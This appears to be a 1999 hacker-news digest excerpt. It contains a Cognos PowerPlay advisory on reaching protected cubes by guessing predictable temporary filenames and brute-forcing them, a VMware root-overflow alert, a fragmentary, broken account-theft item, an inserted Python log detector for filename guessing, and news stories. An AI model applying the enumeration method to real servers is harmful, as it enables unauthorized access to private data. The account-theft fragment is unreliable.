Here we see two temporary files created by one initial cube request. The suffix 't' in the first filename denotes the PowerPlay toolbar and 'x' denotes the data content. These files are fed back to the browser to populate two frames. Clicking on the content filename will allow any user to browse the current cube view with no authentication challenge even if the cube has been password-protected. Once into the cube the user may continue to drill for further data.

(b) weak temporary filename algorithm

Sites that have disabled directory listing may still be vulnerable. Many sites using PowerPlay offer a mix of protected and unprotected cubes. Some sites also offer an anonymous user account (let's say "guest" for example). The PowerPlay CGI uses a common temporary directory for serving all cubes back to the browser. Using the guest account or viewing an unprotected cube a user may right-click the content area and select View Frame Info which will display the temporary filename. By repeatedly reloading the initial cube view and viewing frame info a list of temporary filenames may be generated in order to analyze the filename algorithm. e.g.

http://www.example.com/ppwb/Temp/1eeex.htm
http://www.example.com/ppwb/Temp/1f77x.htm
http://www.example.com/ppwb/Temp/1fcfx.htm
http://www.example.com/ppwb/Temp/1ff6x.htm
http://www.example.com/ppwb/Temp/2014x.htm

Analysis of the filename progression shows:

* the last char is 'x' for the data and 't' for the toolbar
* first n-1 chars are hexadecimal chars only
* the hexadecimal "numbers" comprising the filename are ascending only
* the first char is never 0. e.g. fffx.htm => 1000x.htm
* simple hexadecimal subtraction on the first n-1 chars of consecutive filenames shows a very predictable pattern (see appendix A)

A user may orient themselves in the namespace (the set of all possible filenames) by using a guest account or unprotected cube. Once oriented a set of candidate filenames may be generated and requested from /ppwb/Temp on the server. Of course this approach assumes valid users are hitting the cubes at the same time. Once a successful hit has been made on a temporary file the user may drill further into the data as described in (a) above.

Alternatively a brute force attack on a server could be attempted by just submitting requests for all possible filenames. Of course if you could establish some idea of how long the site has been operational you might start with 4-char filenames. A very new site with low traffic (if the owner displays a page counter) might be best approached with 3-char names. This type of attack would present a beat-the-clock situation as the ~65000 requests (for 4-char) scanned for an existing file before it was purged from the Temp directory.

(c) ad hoc parameters to the CGI

A variety of parameters to http://www.example.com/cgi-bin/ppdscgi.exe provide additional information on the PowerPlay server.

* ?ABOUT= will return the version of PowerPlay.
* ?TOC (or no parameter) presents a table of contents list of all web-enabled cubes on the server. Some sites are using static page links to hit cubes rather than relying on PowerPlay's generated TOC. They may not be aware that all cubes are available.
* the hidden parm PPWB in the data contents frame details the unaliased location of the temporary directory. e.g.

<INPUT TYPE="HIDDEN" NAME="PPWB" VALUE="C:/Netscape/SuiteSpot/docs/ppwb">

III. Solution

(a) dynamic directory listing

Turn this feature off on your web server following the directions provided by the server vendor. If you are unable to disable this feature you may create an index.html file in the /ppwb/Temp directory that will load when a filename has not been specified in the URL.

(b) weak temporary filename algorithm

This is really on Cognos' plate. Watch your error logfile for a lot of failed requests for /ppwb/Temp/*.htm to at least detect an attack. Removing anonymous cube access may slow an attack.

(c) ad hoc parameters to the CGI

Just be aware of what is available by altering the parameters. Don't assume your cubes are hidden because there is no direct link to the table of contents from the web. Password protect your cubes.

DW

APPENDIX A

Here's the output of one subtraction run which shows the v6.5 temporary filenames and then the hex delta between adjacent filenames:

Processing test.dat ...
2161x.htm
216bx.htm   Ax
2188x.htm   1Dx
2192x.htm   Ax
219cx.htm   Ax
21a6x.htm   Ax
21afx.htm   9x
21b9x.htm   Ax
21c3x.htm   Ax
21cdx.htm   Ax
21d7x.htm   Ax
21e0x.htm   9x
21eax.htm   Ax
21f4x.htm   Ax
21fex.htm   Ax
2207x.htm   9x
2211x.htm   Ax
221bx.htm   Ax
2225x.htm   Ax
222fx.htm   Ax
2238x.htm   9x
2242x.htm   Ax
224cx.htm   Ax
2256x.htm   Ax
2260x.htm   Ax
2269x.htm   9x
2273x.htm   Ax
227dx.htm   Ax
2287x.htm   Ax
2291x.htm   Ax
229ax.htm   9x

SUMMARY
diff   count
A    : 23
1D   : 1
9    : 6
out of 31 filenames

Here are some other summaries:

SUMMARY
diff   count
203B : 1
DF   : 1
13   : 4
A    : 10
14   : 3
27   : 1
9    : 1
out of 22 filenames

SUMMARY
diff   count
3E   : 1
A    : 19
9    : 5
out of 26 filenames

Analysis of filenames created under v6.0 of PowerPlay Web Ed. showed:

25bx.htm
25cx.htm    1x
25dx.htm    1x
25ex.htm    1x
25fx.htm    1x
260x.htm    1x
261x.htm    1x
262x.htm    1x
263x.htm    1x
264x.htm    1x
265x.htm    1x
266x.htm    1x
267x.htm    1x
268x.htm    1x
269x.htm    1x
26ax.htm    1x
26bx.htm    1x
26cx.htm    1x

SUMMARY
diff   count
1    : 17
out of 18 filenames

SUMMARY
diff   count
37E  : 1
1    : 491
out of 493 filenames

SUMMARY
diff   count
1E7  : 1
1    : 295
out of 297 filenames

SUMMARY
diff   count
1    : 1255
out of 1256 filenames

APPENDIX B

1999-06-10 analysis submitted to Cognos
1999-06-11 submission acknowledged
1999-06-18 response from Cognos (below)

-----------------------------
Hello Darin,

Thank you for the descriptive analysis of your problem. I understand that you have set up anonymous access and therefore you are aware of the security risk. I agree that the temp file generation is predictable and would suggest logging an enhancement through our web site. In the interim you have to weigh what is acceptable in terms of security knowing that there are other alternatives such as SSL and LDAP. These other options will of course offer substantially more protection. In conclusion your analysis is correct, now it is a factor of weighing your security wants and needs.

Regards,
Michael Bockholt
Cognos Support Specialist
Tel: 1-800-637-7447
email: support@cognos.com
-----------------------------

--------------------------------------------------------------------
Darin White d.w@ibm.net
--------------------------------------------------------------------

@HWA

06.0 VMware Security Alert
~~~~~~~~~~~~~~~~~~~~~

Snarfed from PacketStorm Security: http://packetstorm.harvard.edu/

Date: Fri, 25 Jun 1999 19:18:35 -0700
From: Jason R. Rhoads
To: BUGTRAQ@netspace.org
Subject: VMware Security Alert

"On June 22nd, 1999, VMware, Inc. was notified of a security problem with VMware for Linux 1.0.1. This security hole is also present in all previous versions of VMware for Linux. The security hole has been fixed in VMware for Linux 1.0.2 released today.
The security hole allows a buffer overrun attack against VMware for Linux to result in unprivileged root access to a machine. An updated version of VMware for Linux which fixes this problem is available now, see below. As far as we know, this breach has never been used for malicious purposes, or caused any harm to customer installations. VMware, Inc. apologizes for the inconvenience to our users."

http://www.vmware.com/news/security.html

-----------------------------------------------------------------------------

VMware Security Alert

Date: June 25th, 1999

On June 22nd, 1999, VMware, Inc. was notified of a security problem with VMware for Linux 1.0.1. This security hole is also present in all previous versions of VMware for Linux. The security hole has been fixed in VMware for Linux 1.0.2 released today.

The security hole allows a buffer overrun attack against VMware for Linux to result in unprivileged root access to a machine. An updated version of VMware for Linux which fixes this problem is available now, see below. As far as we know, this breach has never been used for malicious purposes, or caused any harm to customer installations. VMware, Inc. apologizes for the inconvenience to our users.

Vulnerable Systems

The security hole allows an attack to occur during VMware startup, but before a virtual machine is powered on. Guest operating systems themselves are unlikely to be affected by these buffer overflow attacks. Systems most vulnerable to this attack are multi-user Linux systems that have VMware installed. A malicious user with access to an account on the system could exploit the hole. Stand alone single-user machines are not at high risk from this security hole. This hole does not allow direct network based 'worm' style attacks against VMware.

This security hole was discovered by Asylum Security, a division of CyberSpace 2000, a professional computer security response team.

VMware has taken immediate action in response to this event. VMware for Linux 1.0.2 was made available for download on June 25th, 1999 on our web site and mirror sites. The shipment of CD-ROMs has been suspended and the inventory discarded. Customers who have purchased VMware for have been notified by electronic mail, VMware has also posted security alerts to newsgroups at news.vmware.com.

Affected VMware Releases

This security hole is present in VMware for Linux 1.0.1 and all previous versions, including the beta versions (build-106, build-135, build-152) and the experimental version (build-179). VMware recommends that users replace beta and experimental versions with VMware for Linux 1.0.2. An updated VMware for Linux experimental release with fixes for this security hole will be made available in the near future.

How to Close this Security Hole

The security hole can be closed by simply upgrading to VMware for Linux version 1.0.2:

1. Download VMware for Linux 1.0.2 from one of our mirror sites

2. Untar the distribution.

       tar zxvf vmware-1.0.2.tar.gz

3. Change directory to vmware-install

       cd vmware-install

4. As root, install VMware for Linux

       su
       ./install.pl

You will first be asked whether you want to upgrade VMware for Linux. Simply answer yes at this point and then follow any installer instructions.

NOTE: It is not possible to resolve this security problem by removing suid (Set User ID) root privileges from the VMware executable. VMware must be suid root to run correctly.

Reporting Security Issues

VMware is committed to addressing security issues and providing customers with information on how they can protect themselves. If you identify what you believe may be a security issue with a VMware product, please send an email to security@vmware.com. We will work to appropriately address and communicate the issue.

Notification of Security Alerts

When VMware becomes aware of a security issue that significantly affects our products, we will take action to notify affected customers. Typically this notification will be in the form of a security bulletin explaining the issue, and where possible a response to the problem. These bulletins will both be emailed to affected customers and posted on our web site and newsgroups at news.vmware.com.

-----------------------------------------------------------------------------

Date: Sat, 26 Jun 1999 17:33:22 -0400
From: Don
To: BUGTRAQ@netspace.org
Subject: VMWare Advisory - buffer overflows

This advisory was made on 06/21/99 and was to be released on 06/28/99 (or after a fix was released). We would like to recognize the VMware staff and their responsiveness to the bug reports. Last night, customers who purchased their product received notices to upgrade to VMware v1.0.2.

For more information on the VMware bugs, visit:

http://www.vmware.com/news/security.html
http://www.cyberspace2000.com/security/advisories

-Don Sausa

----------[asylum security]------------
id: #99021, team director
e-mail: don@cyberspace2000.com
web: http://cyberspace2000.com/security
---------------------------------------

Team Asylum Security
Copyright (c) 1999 By CyberSpace 2000
http://www.cyberspace2000.com/security

Source: Seth L. [seth@cyberspace2000.com]
Advisory Date: 06/21/99
Release Date: 06/28/99 [ Final Revision: 06/25/99 ]

Affected
--------
VMware v1.0.1 and earlier for Linux.

Product Description
-------------------
VMware v1.0.1 is a software product by VMware, Inc. that creates a virtual machine in which you can install multiple operating systems without repartitioning or formatting your hard drive.

Vulnerability Summary
---------------------
Team Asylum has found multiple buffer overflows existing in VMware v1.0.1 for Linux. Earlier versions also have the same buffer overflows. VMware Inc. has been notified of these overflows and they have released VMware v1.0.2 as a fix. Any local user can exploit these overflows to gain root access.

Fix
---
All users are encouraged to upgrade to VMware v1.0.2. You may download it directly off http://www.vmware.com.

Special Thanks
--------------
Special thanks to VMware staff for responding quickly to our bug reports. Within 3 days, they have managed to fix the overflows, as well as stop the physical distribution of their v1.0.1 product. All customers who have purchased VMware have been notified as of 06/25/99 12:00 midnight (PST) about the new VMware v1.0.2 version.

@HWA

07.0 Security vulnerability in hustler.com login template
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Snarfed from PacketStorm Security: http://packetstorm.harvard.edu/

security vulnerability in hustler.com which allows any user to steal another users account and gain access to full access to their account including cc# information no fix yet. hustler.com has been informed.

----------------------------------------------------------------------------
exploit template
----------------------------------------------------------------------------

HUSTLER LOGIN THEIF BY EGODEATH
HACKED

Change My Password - ego's M0D1Fi3D verzi0n

Highlight the User ID: This is the hustler account thief script
in order for this to work you must know
somones real login name ( if its an old carded
account with a nick like XTC, give up
you cant steal a froozen account, but
yea.. u can change its password...
Enter Your New Password Enter Password again
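
Back to the Cognos PowerPlay advisory in section 05.0: its Solution (b) says to watch the log for a lot of failed requests for /ppwb/Temp/*.htm. The Python below is an added example, not part of the advisory or of any Cognos tooling; it assumes a Common Log Format access log, and the function names, finding labels, threshold, window and sample log lines are all constructed for this illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Common Log Format: host ident user [time] "METHOD path PROTO" status size
CLF = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+$'
)
# Temp file names as the advisory describes them: hex digits (first never 0),
# then 'x' (data) or 't' (toolbar), then ".htm".
TEMP_FILE = re.compile(r'^/ppwb/Temp/[1-9a-f][0-9a-f]*[xt]\.htm$', re.I)
TEMP_DIR = "/ppwb/Temp/"
CGI_NAME = "ppdscgi.exe"


def parse_clf(line):
    """Return (host, datetime, path, status), or None for unparseable lines."""
    m = CLF.match(line.strip())
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    path = m["path"].split("?", 1)[0]          # drop the query string
    return m["host"], ts, path, int(m["status"])


def find_temp_probing(lines, threshold=20, window=timedelta(minutes=5)):
    """Scan access-log lines and return {host: set of finding labels}.

    temp-dir-requested     the bare /ppwb/Temp/ directory was asked for
    temp-name-guessing     >= threshold 404s on temp names inside the window
    temp-file-without-cgi  a temp file was served to a host that never called
                           the CGI (assumption: normal viewers always do first)
    """
    findings = defaultdict(set)
    misses = defaultdict(deque)    # host -> timestamps of recent 404s
    used_cgi = set()               # hosts seen requesting ppdscgi.exe
    for line in lines:
        rec = parse_clf(line)
        if rec is None:
            continue
        host, ts, path, status = rec
        if path.lower().endswith("/" + CGI_NAME):
            used_cgi.add(host)
        elif path == TEMP_DIR:
            findings[host].add("temp-dir-requested")
        elif TEMP_FILE.match(path):
            if status == 404:
                q = misses[host]
                q.append(ts)
                while ts - q[0] > window:      # slide the window forward
                    q.popleft()
                if len(q) >= threshold:
                    findings[host].add("temp-name-guessing")
            elif status == 200 and host not in used_cgi:
                findings[host].add("temp-file-without-cgi")
    return dict(findings)


def sample_log():
    """Constructed log lines (documentation addresses, invented traffic)."""
    def row(host, sec, path, status):
        ts = datetime(1999, 6, 25, 9, 17, 0) + timedelta(seconds=sec)
        return '%s - - [%s -0400] "GET %s HTTP/1.0" %d 512' % (
            host, ts.strftime("%d/%b/%Y:%H:%M:%S"), path, status)
    lines = [
        # Normal viewer: calls the CGI, then loads the two frame files.
        row("192.0.2.10", 0, "/cgi-bin/ppdscgi.exe?TOC", 200),
        row("192.0.2.10", 1, "/ppwb/Temp/1ad6t.htm", 200),
        row("192.0.2.10", 1, "/ppwb/Temp/1ad6x.htm", 200),
        row("203.0.113.5", 5, "/cgi-bin/ppdscgi.exe", 200),
        row("198.51.100.7", 10, "/ppwb/Temp/", 200),
    ]
    # One client producing 25 misses in under a minute, then one hit.
    for i in range(25):
        lines.append(row("198.51.100.7", 20 + 2 * i,
                         "/ppwb/Temp/%xx.htm" % (0x1b00 + i), 404))
    lines.append(row("198.51.100.7", 80, "/ppwb/Temp/1ad6x.htm", 200))
    # Normal viewer reloading a frame whose file was already purged.
    lines.append(row("203.0.113.5", 900, "/ppwb/Temp/1ad9x.htm", 404))
    return lines


if __name__ == "__main__":
    for host, labels in sorted(find_temp_probing(sample_log()).items()):
        print(host, ", ".join(sorted(labels)))
```

A single 404 from a viewer whose temporary file has been purged stays below the threshold, so only the client that never touched the CGI is reported.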
@HWA 08.0 DOD investigating computer 'Mob-like' tactics ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From: Federal Computer Week;http://www.fcw.com/pubs/fcw/fcwhome.htm JUNE 30, 1999 . . . 12:25 EDT DOD investigating computer 'mob tactics' BY DANIEL VERTON (dan_verton@fcw.com) While a senior adviser to the Defense Department testified before Congress this week on threats to national security stemming from the export of powerful computer technology, his supervisor allegedly attempted to access and tamper with his computer, prompting the immediate launch of a full-scale investigation. Rep. Dan Burton (R-Ind.), chairman of the House Government Reform Committee, said Jay Davis, director of the Defense Threat Reduction Agency, informed the committee on June 28 that an investigation was under way into an incident involving unauthorized access to the computer belonging to a senior strategic trade adviser to the agency. According to Burton, the incident took place while Peter Leitner, a longtime internal critic of DOD's policy on exporting sensitive computer technologies, was testifying on June 24 before the committee regarding security problems stemming from that policy. Although no details from the investigation have been released yet, Burton claims that the incident is an example of DOD officials trying to strong-arm a congressional witness into not cooperating with the committee. "While Dr. Leitner was telling my committee about the retaliation he suffered for bringing his concerns to his superiors and Congress, his supervisor was trying to secretly access his computer," Burton said. "This smacks of mob tactics. Congress will not stand for this kind of witness intimidation." Although DTRA has launched an investigation into the incident, Burton said he plans to call upon Defense Secretary William Cohen to ask for "his personal involvement" in the case. 
"I intend to ask a lot of questions of the Defense Department officials involved, and I expect to get straight answers," Burton said. Leitner has criticized the department's policy of easing export controls on powerful computer technology that is used to simulate and test the reliability of nuclear weapons, claiming that the acquisition of supercomputer technology abroad was feeding a new form of Cold War characterized by an arms race for "virtual weapons." @HWA 09.0 GSA announces Intrusion Detection Net ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From: Federal Computer Week;http://www.fcw.com/pubs/fcw/fcwhome.htm JUNE 28, 1999 GSA launches intrusion-detection net BY DIANE FRANK (diane_frank@fcw.com) The General Services Administration last week asked industry for information about emerging security technology for detecting unauthorized users on agency networks, with the goal of building a government intrusion-detection system by the end of next year. In building the Federal Intrusion Detection Network (Fidnet), GSA hopes to find security tools vendors are developing that overcome the weaknesses of existing technology. By keeping ahead of the latest technology, GSA hopes to leave agency defenses less vulnerable to hackers, agency officials said. "We want to encourage people to develop new technologies that will help us keep neck and neck with the perpetrator," said David Jarrell, program manager for the GSA portion of Fidnet in the Federal Technology Service's Office of Information Security and technical director of the Federal Computer Incident Response Capability. OIS will look not only to established intrusion-detection vendors but to new companies and people that "we haven't even heard of," Jarrell said. "I think there are people out there that are significantly brilliant enough to solve this and we hope that this [request for information] will cause them to come forward," he said. 
GSA plans to use the vendor-provided information to develop prototypes by the first quarter of fiscal 2000, said Tom Burke, GSA's assistant commissioner of information security. Down the line, OIS may even pay some of the vendors to put together a long-term, real-world demonstration of their capabilities at an agency, he said. GSA particularly is interested in finding intrusion-detection systems that are more capable of detecting attacks as they happen instead of after the fact. The problem is that most intrusion-detection solutions work the same way anti-virus protection does: They check network-use patterns against a known list of intrusion "signatures" and send out alerts when they come across a match. But as vendors and users have known for years, this method will not catch intrusions that are not on that list. Also, most products just now are advancing to the point where they alert administrators at the time an intrusion takes place. "We find that many of the off-the-shelf products that are available today are really a response to the intrusions, and they are always a step behind the intruder," Jarrell said. "We want to look to the future and some artificial intelligence that will learn as it goes about the attacks that are being launched." This type of capability would be more than welcome to agencies, especially if they are enabled to respond more quickly at the local level, said one senior civilian agency official. Others recognized the potential benefits of sharing attack "experience" across government. "What I would hope this next-generation intrusion detection could bring to us is the capability not only to monitor [intrusions] but to put together the information in a history for reference," said Sarah Jane League, Defense Department liaison at the Critical Infrastructure Assurance Office. 
"It should bring that pattern recognition and learn as it goes...so that over time it will have the ability to recognize" not only attacks but what could be attacks, she said. Vendors have been working on this type of product, sometimes called anomaly detection, for some time. "ISS has a lot of research efforts in place to advance the intrusion-detection market," said Mark Wood, intrusion-detection product manager at Internet Security Systems Inc., maker of the Real-Secure intrusion-detection product line. "Having a pre-defined list of signatures is nice, but you'd like to detect novel attacks, things you don't know about." One major problem vendors are struggling with in producing this type of solution is the large number of "false positives" -- incorrectly perceived attacks -- that are generated when a network is scanned, Wood said. Despite this, a commercially viable solution could be available within the next year, he said. "It's certainly worthwhile that someone like the GSA is driving this; it's absolutely necessary," Wood said. "Perhaps this will help coordinate the industry so that they will provide something sooner than they would have." The need for this type of solution across government has been underscored by the more than 40 federal World Wide Web sites that have been hacked in the last two months, including at least six last week. And these attacks are only the most noticeable types of intrusions into government networks, according to federal experts testifying before Congress last week [see related story, "House member suggests regular network security reports"]. However, in the end, while many would wish otherwise, keeping up with attackers instead of one step behind really is the best that anyone can do, Jarrell said. "There is no silver bullet; there is no perfect solution when it comes to intrusion detection," he said. "As I've said before, if you build a better mousetrap, a better mouse will evolve." 
@HWA

10.0 Nasa servers reportedly hacked
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.newsbytes.com/pubNews/132718.html

30 Jun 1999, 10:51 AM CST
By David McGuire, Newsbytes.
MINNEAPOLIS, MINNESOTA, U.S.A., .

In what appears to be the third computer attack on a government Website this week, crackers may have gained unauthorized access to one or more National Aeronautics and Space Administration (NASA) servers yesterday.

"There is some indication that a couple servers at the Marshall Space Flight Center in Huntsville, Alabama" were attacked earlier this week, a NASA spokesperson told Newsbytes today. NASA could not confirm the reports as of this writing. The Marshall site was up and running as of 11:00 EDT today.

While Sunday's hack of the US Army's home page typifies the kind of high-profile attack favored by many hacker (more accurately known as cracker) groups, the apparent Marshall attack and yesterday's crack of National Oceanic and Atmospheric Administration's (NOAA) Norman, Okla.-based Storm Prediction Center are more puzzling, Newsbytes notes.

Marshall is a fairly low-profile NASA center that focuses primarily on research in the areas of astronomy, low gravity, and space shuttle propulsion. The Storm Prediction Center (SPC) provides nationwide weather forecasts.

The SPC hack caught NOAA by surprise. "At about three AM, some Internet customer called one of our forecasters and said 'You better check your Website,'" SPC Director Joe Schaefer told Newsbytes yesterday.

"We produce weather forecasts for the whole country," he said. "We are doing a public good. There is no way I can see that we are harming anybody. To come after a site like this is strange, to put it mildly."

The Army hack was somewhat more typical. At some point Sunday night, crackers replaced the Army's home page with a page that read "Hello, this Website hack has a purpose. The purpose is to settle rumors. Global Hell is alive, Global Hell will not die," Lt. Col. Ron Burns of the Army's Director for Information Systems Command, Control, Communications and Computers (DISC4) unit told Newsbytes Monday.

Sunday's attack was the first successful crack of the Army's main site, located at http://www4.army.mil .

The US Senate and Federal Bureau of Investigation (FBI) have also suffered recent Website attacks. The FBI declined comment on the string of hacker attacks.

Reported by Newsbytes.com, http://www.newsbytes.com .

10:51 CST Reposted 10:59 CST

@HWA

11.0 UK May Force ISPs to Install Taps
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 28th
From HNN http://www.hackernews.com/

contributed by Weld Pond

The British Interception of Communications Act has been the target of proposed changes recently. The changes would require all communications service providers to build in, at their expense, capabilities for government agents to be able to listen in to communications. This proposal is particularly broad as it does not stop at the internet and covers everything from pagers to video conferencing to VPNs. These new requirements have been proposed by the International Law Enforcement Telecommunications Seminar (ILETS), an exclusive FBI funded group that meets in secret.

Tech Web
http://www.techweb.com/news/story/TWB19990625S0019

U.K. Wants ISPs To Build In Interception
(06/25/99, 3:40 p.m. ET)
By Duncan Campbell, TechWeb

The British government has become the first in Europe to openly propose internationally agreed requirements for ISPs to build technology into networks that would allow for police surveillance.

Under proposals for changes to the Interception of Communications Act announced by the Home Office this week, all communications service providers (CSPs) would be required to build interception software or hardware into their systems. The law -- if passed -- will apply to all types of new communications services, including Internet telephony, TV conferencing, paging, and satellite based personal communications systems.

The International User Requirements have been drawn up over the past six years by a group founded by the U.S. FBI, called the International Law Enforcement Telecommunications Seminar (ILETS), which meets in secret. The group excludes representatives from industry or civil rights organizations, and has attempted to standardize its objectives as an International Telecommunication Union requirement.

According to this week's "white paper," every type of network will be covered, including VPNs operated through the Internet or other TCP/IP systems. The new law will also cover interception of business telecom services, ranging from basic networks of a few lines found within a small office to large networks linking offices, in both the public and private sectors, the document says.

Under the present British Interception of Communications Act, only licensed public telecom operators have to provide government tapping facilities within their networks. However, ISPs must surrender any stored communications data they have, including e-mail, Web-access records, and service details, if served with an order.

Home Secretary Jack Straw now proposes all CSPs be required to take reasonable steps to ensure their system is capable of being intercepted.

"This will be an ongoing requirement CSPs will have to consider each time they develop their network or introduce new services," Straw said. "CSPs will also be required to provide reasonable assistance to effect warranted intercepts."

This will include real-time access to data about their subscribers and information about services they have used, including logs of telephone calls, e-mail, or website accesses. A key part of technical arrangements to be made will ensure operators will not be able to know what information has been copied from their systems.

The British government said the new law would make full provision for human-rights legislation, Straw said.
But according to Madeleine Colvin of Justice, the international human-rights organization and British section of the International Commission of Jurists, the proposed law would not achieve this. "There are major gaps in what these proposals suggest for controlling surveillance methods. For example, how is anyone to know if their human rights may have been abused if they are never going to be told that their e-mail has been intercepted by the government?" he asked.

@HWA

12.0 Crypto Tie Downs Loosened
~~~~~~~~~~~~~~~~~~~~~~~~~

June 28th
From HNN http://www.hackernews.com/

contributed by mortel
Bills to loosen the restrictions on exporting strong encryption were approved on Thursday by the U.S. Senate and House Commerce Committees. The House Security and Freedom through Encryption (SAFE) Act removes the government restrictions on export of strong encryption if a comparable encryption product is commercially available outside the U.S. In addition, the SAFE Act bars the government from requiring key recovery. Yeah!

CNN
http://www.cnn.com/TECH/computing/9906/25/cryptbill.idg/

U.S. committees approve encryption bill
by Elinor Mills Abreu
From...

(IDG) -- The U.S. Senate and House Commerce Committees Thursday approved bills that would liberalize encryption export regulations. In addition, the Senate committee passed bills calling for the promotion of digital signatures and filtering software to block pornography. The House Security and Freedom through Encryption (SAFE) Act removes the government restrictions on export of strong encryption if a comparable encryption product is commercially available outside the U.S. In addition, the SAFE Act bars the government from requiring key recovery, whereby the government would have access to keys to decode encrypted messages for law-enforcement purposes. The government argues that it needs to control the export of strong encryption for national security.
Vendors argue that the restrictions hamper their competitiveness on the worldwide market because strong encryption is readily available outside the U.S. The government wants vendors to develop encryption software that includes a key recovery mechanism. The amendments approved by the House committee would do several things: require that a comparable encryption product be available in a country outside the U.S. in order for a U.S. company to export similar technology there; bar export to the People's Liberation Army or the Communist Military in China; allow the Secretary of Commerce to deny the export of encryption products if they would be used to harm national security, to sexually exploit children or to execute other illegal activities; require the Secretary of Commerce to consult with the secretaries of State and Defense, the Director of Central Intelligence and the Attorney General when reviewing a product; and subject a person to criminal penalties for not providing access to encrypted data if a subpoena were served and the person had the capability to decrypt the data. Meanwhile, Sen. John McCain [R-Ariz.] proposed a Senate encryption bill that would allow for the exportation of encryption of key lengths up to 64 bits. In general, companies currently must get a license to export encryption higher than 56 bits in key length. In addition, the McCain encryption bill would allow for the export of stronger "nondefense" encryption to "responsible entities" and governments in the North Atlantic Treaty Organization, the Association of Southeast Asian Nations and the Organization for Economic Cooperation and Development. However, the Secretary of Commerce would be allowed to prohibit export of particular encryption products to an individual or organization in a foreign country. 
An Encryption Export Advisory Board would be created to review applications for exemption of encryption of over 64 bits, make recommendations to the Secretary of Commerce and authorize more funding to law enforcement and national security agencies to "upgrade facilities and intelligence." The bill would ask the National Institute of Standards and Technology to establish an advanced encryption standard by Jan. 1, 2002. "The bill carefully balances our national security and law enforcement interests while updating current laws on encryption technology," McCain said in a statement. "It is illogical to deny U.S. producers the ability to compete globally if similar products are already being offered by foreign companies." On the digital signature front, Sen. Spencer Abraham [R-Mich.] said the Millennium Digital Commerce Act he sponsored would "ensure that individuals and organizations in different states are held to their agreements and obligations even if their respective states have different rules concerning electronically signed documents." The Abraham bill would pre-empt state law from denying that digital contracts are legal solely because they are in electronic form; establish guidelines for international use of electronic signatures that would remove obstacles to electronic transactions; and allow the market to determine the type of authentication technology used in international commerce. The Senate Commerce Committee also grappled with Internet censorship by approving another McCain-sponsored bill. The plan would require schools and libraries receiving government universal service discounts for Internet access to use filtering technology on computers children access that would screen out pornography. Taking up a less controversial bill, the Senate committee also approved a measure to tie cellular phone users calling 911 to medical centers, police and firefighters for faster response time to accidents and emergencies. 
The bill would expand the coverage areas of wireless telephone service; establish parity of protection for the provision or use of wireless 911 service; and upgrade 911 systems so they can provide information such as location and automatic crash notification data. Alan Davidson, staff counsel for the Washington, D.C.-based Center for Democracy and Technology, said "it was a mixed day for the Internet on Capitol Hill." While legislators realize the potential of electronic commerce and favor liberalizing encryption export to advance it, they are fearful of what they see as the "dark side" of the Internet - content that might be objectionable, according to Davidson. Rather than require filtering software in schools and libraries, legislators should offer educational institutions the flexibility to choose "acceptable use or monitoring policies," he said. "Mandating that every school and library filter access to the Internet is not going to be the best way to protect kids," he said. "In addition to the fact that the bill has constitutional problems, it mandates one technological approach without regard to the more effective ways that local communities are already protecting kids." Other committees may review these bills before they go to the floor of the two houses for a vote, he said.

@HWA

13.0 Heathen.A Spreads Through Word Files
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 28th
From HNN http://www.hackernews.com/

contributed by nvirb
While not intentionally malicious or as fast spread as Melissa or WormExplorer, Heathen.A is the latest threat to computer users. Heathen.A is considered to be a multipartite virus and infects only Word97 files.

PC World
http://www.pcworld.com/pcwtoday/article/0,1510,11586,00.html

Heathen.A Is at the Gates
Keep a lookout: There's a new bug in town.
by Matthew Nelson, InfoWorld Electric
June 25, 1999, 4:50 p.m.
PT

SAN MATEO, CALIFORNIA -- Network Associates' Anti-Virus Emergency Response Team is warning users about what it terms a "medium risk" virus called Heathen.A. Heathen.A is a multipartite virus, as it uses two classes of files, an .exe portion and a .doc portion, for its infection. The virus was originally spread from a newsgroup and replicates itself across Microsoft Word 97 files, but it does not destroy data. "It's delivered if someone receives an e-mail with an infected Word 97 document, or if they access any server file that is infected," says Allison Taylor, product marketing manager for corporate antivirus solutions at Network Associates. "It doesn't carry a particular payload except for dropping a patch into your [Windows] 95/98 shell." "It runs a modified version of your Windows Explorer system and then infects the Word 97 documents," Taylor explains. "So once you've been infected, any Word 97 file that you open from then on will also be infected." The macro drops three system files, heathen.vex, heathen.vdl, and heathen.vdo, into a system's C:/Windows subdirectory. When the system is rebooted, the heathen.vex file is renamed explorer.exe, according to AVERT Labs. NAI has assigned the Heathen.A virus a medium-risk level as it is not engineered to appear to be coming from a known user, and because it infects new systems only if a user opens an infected Word 97 file. Heathen.A does not send itself through e-mail as Melissa and Worm.ExploreZip do. NAI has issued a virus update to protect against the Heathen.A virus at AVERT Labs' Web site.

@HWA

14.0 $950 for a Log File Analysis Tool
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 28th
From HNN http://www.hackernews.com/

contributed by Weld Pond
Sandstorm Enterprises has introduced what they are calling a TCP/IP Session Reassembler named TCP.demux. According to the press release it doesn't seem to be more than a glorified grep script. Maybe it is actually useful but $950 seems a little steep.
Excite News
http://news.excite.com/news/bw/990623/ma-sandstorm

Sandstorm Enterprises
http://www.sandstorm.net

Sandstorm Enterprises Introduces TCP.demux, a TCP/IP Session Reassembler; New, Efficient Tool for Network-Based Investigations, Auditing, and Reverse Engineering

Updated 1:34 PM ET June 23, 1999

